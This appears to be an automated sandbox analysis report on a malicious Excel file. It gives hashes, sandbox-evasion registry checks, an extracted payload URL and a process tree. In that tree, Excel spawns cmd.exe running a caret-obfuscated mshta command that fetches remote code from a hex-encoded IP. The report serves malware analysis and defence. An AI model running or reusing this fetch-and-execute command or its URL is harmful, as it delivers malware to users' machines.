Analysis
-
max time kernel
147s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20/11/2024, 03:41
Behavioral task
behavioral1
Sample
f9a1443232b13a12bba41c02e7720278627ed24ea0988f9953b4717ff8ee6a3a.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f9a1443232b13a12bba41c02e7720278627ed24ea0988f9953b4717ff8ee6a3a.xls
Resource
win10v2004-20241007-en
General
-
Target
f9a1443232b13a12bba41c02e7720278627ed24ea0988f9953b4717ff8ee6a3a.xls
-
Size
102KB
-
MD5
9a7a8c75f3b0d70677de69bb83e124b1
-
SHA1
1fc88cb99977b9f1cf6995e74f264661b6e4fd5c
-
SHA256
f9a1443232b13a12bba41c02e7720278627ed24ea0988f9953b4717ff8ee6a3a
-
SHA512
e9a1b7a41430c904054bd13cc73291e7021c994cd50b4c742d32b014cb6dfcef0f2a6a6e1b8aff7bbcf3c9b708d7f0cf6f3109e11e5f2fa332e20dd54d058320
-
SSDEEP
3072:n/k3hbdlylKsgqopeJBWhZFGkE+cL2NdAFxe53lGvFTQ3IzxgdrvxpU0OKvMB:/k3hbdlylKsgqopeJBWhZFVE+W2NdAOK
Malware Config
Extracted
http://185.7.214.7/fer/fe3.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3004 376 cmd.exe 82 -
Blocklisted process makes network request 1 IoCs
flow pid Process 19 2244 mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 376 EXCEL.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 376 EXCEL.EXE 376 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 376 EXCEL.EXE 376 EXCEL.EXE 376 EXCEL.EXE 376 EXCEL.EXE 376 EXCEL.EXE 376 EXCEL.EXE 376 EXCEL.EXE 376 EXCEL.EXE 376 EXCEL.EXE 376 EXCEL.EXE 376 EXCEL.EXE 376 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 376 wrote to memory of 3004 376 EXCEL.EXE 84 PID 376 wrote to memory of 3004 376 EXCEL.EXE 84 PID 3004 wrote to memory of 2244 3004 cmd.exe 86 PID 3004 wrote to memory of 2244 3004 cmd.exe 86
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\f9a1443232b13a12bba41c02e7720278627ed24ea0988f9953b4717ff8ee6a3a.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:376 -
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe3.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\system32\mshta.exemshta http://0xb907d607/fer/fe3.html3⤵
- Blocklisted process makes network request
PID:2244
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize3KB
MD59a290c36b17c7153af2d5d61e099d237
SHA1c4606bc93759e008390f6a1f84361c1cfe13e2df
SHA2566be45610726b4470fd36a677034e8583f93aa51cbf1df5ff5b7654bafe85ec33
SHA5122ded1193d57221d0fc44b648448e9004ee9e84fb7619fc73565f3e607ec1d4ab47acbc306e9a8cf60f262fe70d09d72107a42eb64604f8a05a797278351e20fd